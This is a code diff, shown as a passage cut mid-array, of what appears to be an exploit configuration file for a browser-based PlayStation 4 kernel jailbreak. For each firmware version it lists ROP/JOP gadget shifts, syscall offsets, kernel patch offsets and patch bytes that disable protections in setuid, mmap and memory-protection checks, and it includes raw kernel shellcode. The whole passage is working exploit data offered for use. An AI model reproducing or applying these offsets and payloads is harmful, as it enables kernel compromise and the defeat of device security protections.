+} else if (fwFromUA >= 4.50 && fwFromUA <= 4.74) {
+ gadget_shifts = {
+ 'stackshift_jop1': 0x00000048, // 4.50-4.74
+ 'stackshift_jop6': 0x00000028, // 3.50-5.07
+ 'jump_shift_jop1': 0x000007D0, // 4.50-5.07
+ 'jump_shift_jop5': 0x00000420, // 4.50-5.07
+ 'jump_shift_jop6': 0x00000040, // 4.50-5.07
+ };
+} else if (fwFromUA >= 5.00 && fwFromUA <= 5.07) {
+ gadget_shifts = {
+ 'stackshift_jop1': 0x00000058, // 5.00-5.07
+ 'stackshift_jop6': 0x00000028, // 3.50-5.07
+ 'jump_shift_jop1': 0x000007D0, // 4.50-5.07
+ 'jump_shift_jop5': 0x00000420, // 4.50-5.07
+ 'jump_shift_jop6': 0x00000040, // 4.50-5.07
+ };
+}
+
+// Missing <=3.15
+// Only used for FWs <=4.07
+// These are from libkernel_web.sprx (libkernel.sprx on FWs <4.00)
+var syscallMap = {};
+if (fwFromUA >= 3.50 && fwFromUA <= 3.70) {
+ syscallMap = {
+ 3: 0xAB20, // sys_read
+ 4: 0xAB40, // sys_write
+ 5: 0xAB60, // sys_open
+ 6: 0xAB80, // sys_close
+ 20: 0xACE0, // sys_getpid
+ 23: 0xAD40, // sys_setuid
+ 24: 0xAD60, // sys_getuid
+ 50: 0xDA10, // sys_setlogin
+ 54: 0xB0A0, // sys_ioctl
+ 73: 0xB1E0, // sys_munmap
+ 74: 0xB200, // sys_mprotect
+ 97: 0xB3E0, // sys_socket
+ 98: 0xB400, // sys_connect
+ 203: 0xB900, // sys_mlock
+ 324: 0xBD20, // sys_mlockall
+ 362: 0xBF40, // sys_kqueue
+ 363: 0xBF60, // sys_kevent
+ 477: 0xB1C0, // sys_mmap
+ 557: 0xCB80, // sys_namedobj_create
+ 558: 0xCBA0, // sys_namedobj_delete
+ 591: 0xCF80, // sys_dynlib_dlsym
+ 594: 0xCFE0, // sys_dynlib_load_prx
+ 601: 0xD0C0, // sys_mdbg_service
+ 632: 0xD4A0, // sys_thr_suspend_ucontext
+ 633: 0xD4C0, // sys_thr_resume_ucontext
+ 634: 0xD4E0, // sys_thr_get_ucontext
+ };
+} else if (fwFromUA >= 4.00 && fwFromUA <= 4.07) {
+ syscallMap = {
+ 3: 0x25F0, // sys_read
+ 4: 0x2730, // sys_write
+ 5: 0x2570, // sys_open
+ 6: 0x24D0, // sys_close
+ 20: 0x06F0, // sys_getpid
+ 23: 0x0710, // sys_setuid
+ 24: 0x0730, // sys_getuid
+ 50: 0x0640, // sys_setlogin
+ 54: 0x0970, // sys_ioctl
+ 73: 0x09F0, // sys_munmap
+ 74: 0x0A10, // sys_mprotect
+ 97: 0x0B70, // sys_socket
+ 98: 0x24F0, // sys_connect
+ 203: 0x1030, // sys_mlock
+ 324: 0x1230, // sys_mlockall
+ 362: 0x1390, // sys_kqueue
+ 363: 0x13B0, // sys_kevent
+ 477: 0x27B0, // sys_mmap
+ 557: 0x1AF0, // sys_namedobj_create
+ 558: 0x1B10, // sys_namedobj_delete
+ 591: 0x1D50, // sys_dynlib_dlsym
+ 594: 0x1DB0, // sys_dynlib_load_prx
+ 601: 0x1E70, // sys_mdbg_service
+ 632: 0x21D0, // sys_thr_suspend_ucontext
+ 633: 0x21F0, // sys_thr_resume_ucontext
+ 634: 0x2210, // sys_thr_get_ucontext
+ };
+}
+
+// Missing: <=3.70 and all devkits
+// These are from the decrypted/dumped kernel
+var kernel_offsets = {};
+if (fwFromUA === 3.50) {
+ kernel_offsets = {
+ '_vn_lock_break_slide': 0x00242BA6, // 3.50
+ '__stack_chk_guard': 0x0242AD10, // 3.50-3.55
+ 'kqueue_close_slide': 0x0017BB02, // 3.50
+ 'bpf_slide': 0x0024BC63, // 3.50
+ 'jmp [rsi]': 0x0008AEEA, // 3.50
+ 'cpu_setregs': 0x003A6A40, // 3.50
+ 'mov cr0, rax': 0x003A6A49, // 3.50
+ 'sys_setuid_patch_offset': 0x001A44A0, // 3.50
+ 'sys_mmap_patch_offset': 0x00349667, // 3.50
+ 'vm_map_protect_patch_offset': 0x00341383, // 3.50
+ 'amd64_syscall_patch1_offset': 0x0, /* CHECKTHIS */
+ 'amd64_syscall_patch2_offset': 0x0, /* CHECKTHIS */
+ 'sys_dynlib_dlsym_patch1_offset': 0x0, /* CHECKTHIS */
+ 'sys_dynlib_dlsym_patch2_offset': 0x0, /* CHECKTHIS */
+ 'syscall_11_patch1_offset': 0x00EEDA90, // 3.50-3.55
+ 'syscall_11_patch2_offset': 0x00EEDA98, // 3.50-3.55
+ 'syscall_11_patch3_offset': 0x00EEDAB8, // 3.50-3.55
+ };
+} else if (fwFromUA === 3.55) {
+ kernel_offsets = {
+ '_vn_lock_break_slide': 0x00242CE6, // 3.55
+ '__stack_chk_guard': 0x0242AD10, // 3.50-3.55
+ 'kqueue_close_slide': 0x0017BC22, // 3.55
+ 'bpf_slide': 0x0024BDA3, // 3.55
+ 'jmp [rsi]': 0x001EF468, // 3.55
+ 'cpu_setregs': 0x003A6E80, // 3.55
+ 'mov cr0, rax': 0x003A6E89, // 3.55
+ 'sys_setuid_patch_offset': 0x001A45C0, // 3.55
+ 'sys_mmap_patch_offset': 0x00349A97, // 3.55
+ 'vm_map_protect_patch_offset': 0x003417B3, // 3.55
+ 'amd64_syscall_patch1_offset': 0x0, /* CHECKTHIS */
+ 'amd64_syscall_patch2_offset': 0x0, /* CHECKTHIS */
+ 'sys_dynlib_dlsym_patch1_offset': 0x0, /* CHECKTHIS */
+ 'sys_dynlib_dlsym_patch2_offset': 0x0, /* CHECKTHIS */
+ 'syscall_11_patch1_offset': 0x00EEDA90, // 3.50-3.55
+ 'syscall_11_patch2_offset': 0x00EEDA98, // 3.50-3.55
+ 'syscall_11_patch3_offset': 0x00EEDAB8, // 3.50-3.55
+ };
+} else if (fwFromUA === 3.70) {
+ kernel_offsets = {
+ '_vn_lock_break_slide': 0x00242DB6, // 3.70
+ '__stack_chk_guard': 0x0243AD10, // 3.70
+ 'kqueue_close_slide': 0x0017BCF2, // 3.70
+ 'bpf_slide': 0x0024BE73, // 3.70
+ 'jmp [rsi]': 0x001CAD28, // 3.70
+ 'cpu_setregs': 0x003A6F70, // 3.70
+ 'mov cr0, rax': 0x003A6F79, // 3.70
+ 'sys_setuid_patch_offset': 0x001A4690, // 3.70
+ 'sys_mmap_patch_offset': 0x00349B67, // 3.70
+ 'vm_map_protect_patch_offset': 0x00341883, // 3.70
+ 'amd64_syscall_patch1_offset': 0x0, /* CHECKTHIS */
+ 'amd64_syscall_patch2_offset': 0x0, /* CHECKTHIS */
+ 'sys_dynlib_dlsym_patch1_offset': 0x0, /* CHECKTHIS */
+ 'sys_dynlib_dlsym_patch2_offset': 0x0, /* CHECKTHIS */
+ 'syscall_11_patch1_offset': 0x00EF6FA0, // 3.70
+ 'syscall_11_patch2_offset': 0x00EEDFA8, // 3.70
+ 'syscall_11_patch3_offset': 0x00EEDFC8, // 3.70
+ };
+} else if (fwFromUA >= 4.00 && fwFromUA <= 4.01) {
+ kernel_offsets = {
+ '_vn_lock_break_slide': 0x00109D66, // 4.00-4.01
+ '__stack_chk_guard': 0x024600D0, // 4.00-4.06
+ 'kqueue_close_slide': 0x00233930, // 4.00-4.01
+ 'bpf_slide': 0x003176D9, // 4.00-4.01
+ 'jmp [rsi]': 0x00016B71, // 4.00-4.01
+ 'cpu_setregs': 0x00389200, // 4.00-4.01
+ 'mov cr0, rax': 0x00389209, // 4.00-4.01
+ 'sys_setuid_patch_offset': 0x00085BB0, // 4.00-4.07
+ 'sys_mmap_patch_offset': 0x0031CEAC, // 4.00-4.01
+ 'vm_map_protect_patch_offset': 0x004422B7, // 4.00-4.01
+ 'amd64_syscall_patch1_offset': 0x000ECFB6, // 4.00-4.01
+ 'amd64_syscall_patch2_offset': 0x000ECFDB, // 4.00-4.01
+ 'sys_dynlib_dlsym_patch1_offset': 0x0014A9AD, // 4.00-4.01
+ 'sys_dynlib_dlsym_patch2_offset': 0x000E2CC0, // 4.00-4.01
+ 'syscall_11_patch1_offset': 0x00F179A0, // 4.00-4.06
+ 'syscall_11_patch2_offset': 0x00F179A8, // 4.00-4.06
+ 'syscall_11_patch3_offset': 0x00F179C8, // 4.00-4.06
+ };
+} else if (fwFromUA === 4.05) {
+ kernel_offsets = {
+ '_vn_lock_break_slide': 0x00109E96, // 4.05-4.07
+ '__stack_chk_guard': 0x024600D0, // 4.00-4.06
+ 'kqueue_close_slide': 0x00233A60, // 4.05-4.07
+ 'bpf_slide': 0x00317809, // 4.05
+ 'jmp [rsi]': 0x00065750, // 4.05-4.07
+ 'cpu_setregs': 0x00389330, // 4.05
+ 'mov cr0, rax': 0x00389339, // 4.05
+ 'sys_setuid_patch_offset': 0x00085BB0, // 4.00-4.07
+ 'sys_mmap_patch_offset': 0x0031CFDC, // 4.05
+ 'vm_map_protect_patch_offset': 0x004423E7, // 4.05
+ 'amd64_syscall_patch1_offset': 0x000ED096, // 4.05-4.07
+ 'amd64_syscall_patch2_offset': 0x000ED0BB, // 4.05-4.07
+ 'sys_dynlib_dlsym_patch1_offset': 0x0014AADD, // 4.05-4.07
+ 'sys_dynlib_dlsym_patch2_offset': 0x000E2DA0, // 4.05-4.07
+ 'syscall_11_patch1_offset': 0x00F179A0, // 4.00-4.06
+ 'syscall_11_patch2_offset': 0x00F179A8, // 4.00-4.06
+ 'syscall_11_patch3_offset': 0x00F179C8, // 4.00-4.06
+ };
+} else if (fwFromUA === 4.06) {
+ kernel_offsets = {
+ '_vn_lock_break_slide': 0x00109E96, // 4.05-4.07
+ '__stack_chk_guard': 0x024600D0, // 4.00-4.06
+ 'kqueue_close_slide': 0x00233A60, // 4.05-4.07
+ 'bpf_slide': 0x00317819, // 4.06-4.07
+ 'jmp [rsi]': 0x00065750, // 4.05-4.07
+ 'cpu_setregs': 0x00389340, // 4.06-4.07
+ 'mov cr0, rax': 0x00389349, // 4.06-4.07
+ 'sys_setuid_patch_offset': 0x00085BB0, // 4.00-4.07
+ 'sys_mmap_patch_offset': 0x0031CFEC, // 4.06-4.07
+ 'vm_map_protect_patch_offset': 0x00442427, // 4.06-4.07
+ 'amd64_syscall_patch1_offset': 0x000ED096, // 4.05-4.07
+ 'amd64_syscall_patch2_offset': 0x000ED0BB, // 4.05-4.07
+ 'sys_dynlib_dlsym_patch1_offset': 0x0014AADD, // 4.05-4.07
+ 'sys_dynlib_dlsym_patch2_offset': 0x000E2DA0, // 4.05-4.07
+ 'syscall_11_patch1_offset': 0x00F179A0, // 4.00-4.06
+ 'syscall_11_patch2_offset': 0x00F179A8, // 4.00-4.06
+ 'syscall_11_patch3_offset': 0x00F179C8, // 4.00-4.06
+ };
+} else if (fwFromUA === 4.07) {
+ kernel_offsets = {
+ '_vn_lock_break_slide': 0x00109E96, // 4.05-4.07
+ '__stack_chk_guard': 0x024640D0, // 4.07
+ 'kqueue_close_slide': 0x00233A60, // 4.05-4.07
+ 'bpf_slide': 0x00317819, // 4.06-4.07
+ 'jmp [rsi]': 0x00065750, // 4.05-4.07
+ 'cpu_setregs': 0x00389340, // 4.06-4.07
+ 'mov cr0, rax': 0x00389349, // 4.06-4.07
+ 'sys_setuid_patch_offset': 0x00085BB0, // 4.00-4.07
+ 'sys_mmap_patch_offset': 0x0031CFEC, // 4.06-4.07
+ 'vm_map_protect_patch_offset': 0x00442427, // 4.06-4.07
+ 'amd64_syscall_patch1_offset': 0x000ED096, // 4.05-4.07
+ 'amd64_syscall_patch2_offset': 0x000ED0BB, // 4.05-4.07
+ 'sys_dynlib_dlsym_patch1_offset': 0x0014AADD, // 4.05-4.07
+ 'sys_dynlib_dlsym_patch2_offset': 0x000E2DA0, // 4.05-4.07
+ 'syscall_11_patch1_offset': 0x00F1B9A0, // 4.07
+ 'syscall_11_patch2_offset': 0x00F1B9A8, // 4.07
+ 'syscall_11_patch3_offset': 0x00F1B9C8, // 4.07
+ };
+} else if (fwFromUA >= 4.50 && fwFromUA <= 4.55) {
+ kernel_offsets = {
+ '__stack_chk_guard': 0x02610AD0, // 4.50-4.55
+ 'jmp [rsi]': 0x0013A39F, // 4.50-4.55
+ 'kqueue_close_slide': 0x001E2640, // 4.50-4.55
+ 'cpu_setregs': 0x00280F70, // 4.50-4.55
+ 'mov cr0, rax': 0x00280F79, // 4.50-4.55
+ 'sys_setuid_patch_offset': 0x001144E3, // 4.50-4.55
+ 'sys_mmap_patch_offset': 0x00141D14, // 4.50-4.55
+ 'vm_map_protect_patch_offset': 0x00396A56, // 4.50-4.55
+ 'amd64_syscall_patch1_offset': 0x003DC603, // 4.50-4.55
+ 'amd64_syscall_patch2_offset': 0x003DC621, // 4.50-4.55
+ 'sys_dynlib_dlsym_patch1_offset': 0x003CF6FE, // 4.50-4.55
+ 'sys_dynlib_dlsym_patch2_offset': 0x000690C0, // 4.50-4.55
+ 'syscall_11_patch1_offset': 0x0102B8A0, // 4.50-4.55
+ 'syscall_11_patch2_offset': 0x0102B8A8, // 4.50-4.55
+ 'syscall_11_patch3_offset': 0x0102B8C8, // 4.50-4.55
+ };
+} else if (fwFromUA === 4.70) {
+ kernel_offsets = {
+ 'jmp [rsi]': 0x00139A2F, // 4.70-4.74
+ 'kqueue_close_slide': 0x001E48A0, // 4.70-4.74
+ 'cpu_setregs': 0x00283190, // 4.70
+ 'mov cr0, rax': 0x00283199, // 4.70
+ 'sys_setuid_patch_offset': 0x00113B73, // 4.70-4.74
+ 'sys_mmap_patch_offset': 0x001413A4, // 4.70-4.74
+ 'vm_map_protect_patch_offset': 0x003978E6, // 4.70
+ 'amd64_syscall_patch1_offset': 0x003DD523, // 4.70
+ 'amd64_syscall_patch2_offset': 0x003DD541, // 4.70
+ 'sys_dynlib_dlsym_patch1_offset': 0x003D061E, // 4.70
+ 'sys_dynlib_dlsym_patch2_offset': 0x000686A0, // 4.70-4.74
+ 'syscall_11_patch1_offset': 0x010349A0, // 4.70-4.74
+ 'syscall_11_patch2_offset': 0x010349A8, // 4.70-4.74
+ 'syscall_11_patch3_offset': 0x010349C8, // 4.70-4.74
+ };
+} else if (fwFromUA >= 4.71 && fwFromUA <= 4.74) {
+ kernel_offsets = {
+ 'jmp [rsi]': 0x00139A2F, // 4.70-4.74
+ 'kqueue_close_slide': 0x001E48A0, // 4.70-4.74
+ 'cpu_setregs': 0x00283120, // 4.71-4.74
+ 'mov cr0, rax': 0x00283129, // 4.71-4.74
+ 'sys_setuid_patch_offset': 0x00113B73, // 4.70-4.74
+ 'sys_mmap_patch_offset': 0x001413A4, // 4.70-4.74
+ 'vm_map_protect_patch_offset': 0x00397876, // 4.71-4.74
+ 'amd64_syscall_patch1_offset': 0x003DD4B3, // 4.71-4.74
+ 'amd64_syscall_patch2_offset': 0x003DD4D1, // 4.71-4.74
+ 'sys_dynlib_dlsym_patch1_offset': 0x003D05AE, // 4.71-4.74
+ 'sys_dynlib_dlsym_patch2_offset': 0x000686A0, // 4.70-4.74
+ 'syscall_11_patch1_offset': 0x010349A0, // 4.70-4.74
+ 'syscall_11_patch2_offset': 0x010349A8, // 4.70-4.74
+ 'syscall_11_patch3_offset': 0x010349C8, // 4.70-4.74
+ };
+} else if (fwFromUA >= 5.00 && fwFromUA <= 5.01) {
+ kernel_offsets = {
+ 'jmp [rsi]': 0x00013460, // 5.00-5.07
+ 'kqueue_close_slide': 0x0016D762, // 5.00-5.01
+ 'cpu_setregs': 0x00232F10, // 5.00-5.01
+ 'mov cr0, rax': 0x00232F19, // 5.00-5.01
+ 'sys_setuid_patch_offset': 0x00054A72, // 5.00-5.07
+ 'sys_mmap_patch_offset': 0x0013D510, // 5.00-5.01
+ 'vm_map_protect_patch_offset': 0x001A3AF6, // 5.00-5.01
+ 'amd64_syscall_patch1_offset': 0x00000493, // 5.00-5.01
+ 'amd64_syscall_patch2_offset': 0x000004B1, // 5.00-5.01
+ 'sys_dynlib_dlsym_patch1_offset': 0x00237E2A, // 5.00-5.01
+ 'sys_dynlib_dlsym_patch2_offset': 0x002B2350, // 5.00-5.01
+ 'syscall_11_patch1_offset': 0x0107C820, // 5.00-5.07
+ 'syscall_11_patch2_offset': 0x0107C828, // 5.00-5.07
+ 'syscall_11_patch3_offset': 0x0107C848, // 5.00-5.07
+ };
+} else if (fwFromUA >= 5.03 && fwFromUA <= 5.07) {
+ kernel_offsets = {
+ 'jmp [rsi]': 0x00013460, // 5.00-5.07
+ 'kqueue_close_slide': 0x0016D872, // 5.03-5.07
+ 'cpu_setregs': 0x00233020, // 5.03-5.07
+ 'mov cr0, rax': 0x00233029, // 5.03-5.07
+ 'sys_setuid_patch_offset': 0x00054A72, // 5.00-5.07
+ 'sys_mmap_patch_offset': 0x0013D620, // 5.03-5.07
+ 'vm_map_protect_patch_offset': 0x001A3C06, // 5.03-5.07
+ 'amd64_syscall_patch1_offset': 0x00000493, // 5.03-5.07
+ 'amd64_syscall_patch2_offset': 0x000004B1, // 5.03-5.07
+ 'sys_dynlib_dlsym_patch1_offset': 0x00237F3A, // 5.03-5.07
+ 'sys_dynlib_dlsym_patch2_offset': 0x002B2620, // 5.03-5.07
+ 'syscall_11_patch1_offset': 0x0107C820, // 5.00-5.07
+ 'syscall_11_patch2_offset': 0x0107C828, // 5.00-5.07
+ 'syscall_11_patch3_offset': 0x0107C848, // 5.00-5.07
+ };
+} else if (fwFromUA === 6.50) {
+ kernel_offsets = {
+ 'jmp [rsi]': 0x00050F2D, // 6.50
+ 'kqueue_close_slide': 0x00185F92, // 6.50
+ 'cpu_setregs': 0x000A1B70, // 6.50 /* CHECKTHIS */
+ 'mov cr0, rax': 0x000A1B79, // 6.50 /* CHECKTHIS */
+ 'sys_setuid_patch_offset': 0x0010BB20, // 6.50
+ 'sys_mmap_patch_offset': 0x000AB57A, // 6.50
+ 'vm_map_protect_patch_offset': 0x00451A06, // 6.50
+ 'amd64_syscall_patch1_offset': 0x00000490, // 6.50-7.00
+ 'amd64_syscall_patch2_offset': 0x000004B3, // 6.50-7.00
+ 'sys_dynlib_dlsym_patch1_offset': 0x001D85AA, // 6.50
+ 'sys_dynlib_dlsym_patch2_offset': 0x00419F20, // 6.50
+ 'syscall_11_patch1_offset': 0x0111D210, // 6.50
+ 'syscall_11_patch2_offset': 0x0111D218, // 6.50
+ 'syscall_11_patch3_offset': 0x0111D238, // 6.50
+ };
+} else if (fwFromUA === 7.00) {
+ kernel_offsets = {
+ 'jmp [rsi]': 0x0006B192, // 7.00
+ 'kqueue_close_slide': 0x00079F02, // 7.00
+ 'cpu_setregs': 0x004923E0, // 7.00 /* CHECKTHIS */
+ 'mov cr0, rax': 0x004923ED, // 7.00 /* CHECKTHIS */
+ 'sys_setuid_patch_offset': 0x00087B70, // 7.00
+ 'sys_mmap_patch_offset': 0x001D2336, // 7.00
+ 'vm_map_protect_patch_offset': 0x00264C06, // 7.00
+ 'amd64_syscall_patch1_offset': 0x00000490, // 7.00
+ 'amd64_syscall_patch2_offset': 0x000004B3, // 7.00
+ 'sys_dynlib_dlsym_patch1_offset': 0x0009547B, // 7.00
+ 'sys_dynlib_dlsym_patch2_offset': 0x002F2C20, // 7.00
+ 'syscall_11_patch1_offset': 0x0, // 7.00 /* CHECKTHIS */
+ 'syscall_11_patch2_offset': 0x0, // 7.00 /* CHECKTHIS */
+ 'syscall_11_patch3_offset': 0x0, // 7.00 /* CHECKTHIS */
+ };
+}
+
+// Missing: <=3.70 and all devkits
+// These are from the decrypted/dumped kernel
+var kernel_patches = {};
+if (fwFromUA >= 3.50 && fwFromUA <= 3.70) {
+ kernel_patches = {
+ 'sys_setuid_patch_1': 0x000000B8, // 3.50-7.00
+ 'sys_setuid_patch_2': 0x85C38900, // 3.50-4.07
+ 'sys_mmap_patch_1': 0x37B54137, // 3.50-3.70
+ 'sys_mmap_patch_2': 0x3145C031, // 3.50-7.00
+ 'vm_map_protect_patch_1': 0x9090CA39, // 3.50-3.70
+ 'vm_map_protect_patch_2': 0x90909090, // 3.50-7.00
+ 'amd64_syscall_patch1_1': 0x0, /* CHECKTHIS */
+ 'amd64_syscall_patch1_2': 0x0, /* CHECKTHIS */
+ 'amd64_syscall_patch2_1': 0x0, /* CHECKTHIS */
+ 'amd64_syscall_patch2_2': 0x0, /* CHECKTHIS */
+ 'sys_dynlib_dlsym_patch1_1': 0x0, /* CHECKTHIS */
+ 'sys_dynlib_dlsym_patch1_2': 0x0, /* CHECKTHIS */
+ 'sys_dynlib_dlsym_patch2_1': 0x0, /* CHECKTHIS */
+ 'sys_dynlib_dlsym_patch2_2': 0x0, /* CHECKTHIS */
+ };
+} else if (fwFromUA >= 4.00 && fwFromUA <= 4.07) {
+ kernel_patches = {
+ 'sys_setuid_patch_1': 0x000000B8, // 3.50-7.00
+ 'sys_setuid_patch_2': 0x85C38900, // 3.50-4.07
+ 'sys_mmap_patch_1': 0x37B74137, // 4.05-4.07
+ 'sys_mmap_patch_2': 0x3145C031, // 3.50-7.00
+ 'vm_map_protect_patch_1': 0x9090C239, // 4.00-4.07
+ 'vm_map_protect_patch_2': 0x90909090, // 3.50-7.00
+ 'amd64_syscall_patch1_1': 0x00000000, // 3.55-5.07
+ 'amd64_syscall_patch1_2': 0xF8858B48, // 4.00-4.07
+ 'amd64_syscall_patch2_1': 0x00007DE9, // 4.00-4.07
+ 'amd64_syscall_patch2_2': 0x72909000, // 4.00-4.07
+ 'sys_dynlib_dlsym_patch1_1': 0x0002A9E9, // 4.00-4.07
+ 'sys_dynlib_dlsym_patch1_2': 0x8B489000, // 3.55-7.00
+ 'sys_dynlib_dlsym_patch2_1': 0x90C3C031, // 3.55-7.00
+ 'sys_dynlib_dlsym_patch2_2': 0x90909090, // 3.55-7.00
+ };
+} else if (fwFromUA >= 4.50 && fwFromUA <= 4.74) {
+ kernel_patches = {
+ 'sys_setuid_patch_1': 0x000000B8, // 3.50-7.00
+ 'sys_setuid_patch_2': 0xC6894100, // 4.50-4.74
+ 'sys_mmap_patch_1': 0x37B64137, // 4.50-4.74
+ 'sys_mmap_patch_2': 0x3145C031, // 3.50-7.00
+ 'vm_map_protect_patch_1': 0x9090EA38, // 4.50-4.74 & 6.50
+ 'vm_map_protect_patch_2': 0x90909090, // 3.50-7.00
+ 'amd64_syscall_patch1_1': 0x00000000, // 3.55-5.07
+ 'amd64_syscall_patch1_2': 0x40878B49, // 4.50-5.07
+ 'amd64_syscall_patch2_1': 0x909079EB, // 4.50-4.74
+ 'amd64_syscall_patch2_2': 0x72909090, // 4.50-5.07
+ 'sys_dynlib_dlsym_patch1_1': 0x000352E9, // 4.05-4.74
+ 'sys_dynlib_dlsym_patch1_2': 0x8B489000, // 3.55-7.00
+ 'sys_dynlib_dlsym_patch2_1': 0x90C3C031, // 3.55-7.00
+ 'sys_dynlib_dlsym_patch2_2': 0x90909090, // 3.55-7.00
+ };
+} else if (fwFromUA >= 5.00 && fwFromUA <= 5.07) {
+ kernel_patches = {
+ 'sys_setuid_patch_1': 0x000000B8, // 3.50-7.00
+ 'sys_setuid_patch_2': 0xC4894100, // 5.00-5.07
+ 'sys_mmap_patch_1': 0x37B64037, // 5.00-7.00
+ 'sys_mmap_patch_2': 0x3145C031, // 3.50-7.00
+ 'vm_map_protect_patch_1': 0x9090FA38, // 5.00-5.07
+ 'vm_map_protect_patch_2': 0x90909090, // 3.50-7.00
+ 'amd64_syscall_patch1_1': 0x00000000, // 3.55-7.00
+ 'amd64_syscall_patch1_2': 0x40878B49, // 4.50-7.00
+ 'amd64_syscall_patch2_1': 0x90907DEB, // 5.00-5.07
+ 'amd64_syscall_patch2_2': 0x72909090, // 4.50-5.07
+ 'sys_dynlib_dlsym_patch1_1': 0x0001C1E9, // 5.00-5.07
+ 'sys_dynlib_dlsym_patch1_2': 0x8B489000, // 3.55-7.00
+ 'sys_dynlib_dlsym_patch2_1': 0x90C3C031, // 3.55-7.00
+ 'sys_dynlib_dlsym_patch2_2': 0x90909090, // 3.55-7.00
+ };
+} else if (fwFromUA === 6.50) {
+ kernel_patches = {
+ 'sys_setuid_patch_1': 0x000000B8, // 3.50-7.00
+ 'sys_setuid_patch_2': 0x74C08500, // 6.50-7.00
+ 'sys_mmap_patch_1': 0x37B64037, // 5.00-7.00
+ 'sys_mmap_patch_2': 0x3145C031, // 3.50-7.00
+ 'vm_map_protect_patch_1': 0x9090EA38, // 4.50-4.74 & 6.50
+ 'vm_map_protect_patch_2': 0x90909090, // 3.50-7.00
+ 'amd64_syscall_patch1_1': 0x00000000, // 3.55-7.00
+ 'amd64_syscall_patch1_2': 0x40878B49, // 4.50-7.00
+ 'amd64_syscall_patch2_1': 0x00019DE9, // 6.50-7.00
+ 'amd64_syscall_patch2_2': 0x72909000, // 6.50-7.00
+ 'sys_dynlib_dlsym_patch1_1': 0x0001C7E9, // 6.50
+ 'sys_dynlib_dlsym_patch1_2': 0x8B489000, // 3.55-7.00
+ 'sys_dynlib_dlsym_patch2_1': 0x90C3C031, // 3.55-7.00
+ 'sys_dynlib_dlsym_patch2_2': 0x90909090, // 3.55-7.00
+ };
+} else if (fwFromUA === 7.00) {
+ kernel_patches = {
+ 'sys_setuid_patch_1': 0x000000B8, // 3.50-7.00
+ 'sys_setuid_patch_2': 0x74C08500, // 6.50-7.00
+ 'sys_mmap_patch_1': 0x37B64037, // 5.00-7.00
+ 'sys_mmap_patch_2': 0x3145C031, // 3.55-7.00
+ 'vm_map_protect_patch_1': 0x9090F238, // 7.00
+ 'vm_map_protect_patch_2': 0x90909090, // 3.55-7.00
+ 'amd64_syscall_patch1_1': 0x00000000, // 3.50-7.00
+ 'amd64_syscall_patch1_2': 0x40878B49, // 4.50-7.00
+ 'amd64_syscall_patch2_1': 0x00019DE9, // 6.50-7.00
+ 'amd64_syscall_patch2_2': 0x72909000, // 6.50-7.00
+ 'sys_dynlib_dlsym_patch1_1': 0x0001BDE9, // 7.00
+ 'sys_dynlib_dlsym_patch1_2': 0x8B489000, // 3.55-7.00
+ 'sys_dynlib_dlsym_patch2_1': 0x90C3C031, // 3.55-7.00
+ 'sys_dynlib_dlsym_patch2_2': 0x90909090, // 3.55-7.00
+ };
+}
+
+// Missing: <=3.70, and all devkits
+// Generate this vs making each one?
+// These are from the decrypted/dumped kernel
+// This is Xfast_syscall and then the objects location in relation to Xfast_syscall
+// Fixes are needed for BPF Double Free and namedobj
+// Xfast_syscall:
+// 4.00-4.01: 0x0030EA00, 4.05: 0x0030EB30, 4.06-4.07: 0x0030EB40, 4.50-4.55: 0x003095D0, 4.70: 0x0030B840, 4.71-4.74: 0x0030B7D0, 5.00-7.00: 0x000001C0
+// malloc
+// 4.00-4.05: 0x0013D430, 4.06-4.07: 0x0013D440, 4.50-4.55: 0x000EE180, 4.70-4.74: 0x000ECDF0, 5.00-5.01: 0x0010DF80, 5.03-5.07: 0x0010E090
+// printf
+// 4.00-4.07: 0x00038A50, 4.50-4.55: 0x002F16A0‬, 4.70: 0x002F3910‬, 4.71-4.74: 0x002F38A0, 5.00-5.01: 0x00435AB0, 5.03: 0x00435E40, 5.05-5.07: 0x00435E80
+// M_KQUEUE
+// 4.00-4.01: 0x0104A8C0‬, 4.05: 0x0104E790, 4.06: 0x0104A780, 4.07: 0x0104E780, 4.50-4.55: 0x0165A680, 4.70: 0x1660500, 4.71-4.74: 0x01660570, 5.00-5.07: 0x014B7160
+
+var cleanup_shcode = [];
+if (fwFromUA === 3.50) {
+ if (devkit === true) {
+ cleanup_shcode = []; /* TODO */
+ } else {
+ cleanup_shcode = []; /* TODO */
+ }
+} else if (fwFromUA === 3.55) {
+ if (devkit === true) {
+ cleanup_shcode = []; /* TODO */
+ } else {
+ cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x14D02494, 0x8D4DFFCF, 0x2BD024B4, 0x8D4DFFEC, 0x8A5024AC, 0x81490003, 0x04A790C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000];
+ }
+} else if (fwFromUA >= 4.00 && fwFromUA <= 4.01) {
+ if (devkit === true) {
+ cleanup_shcode = 
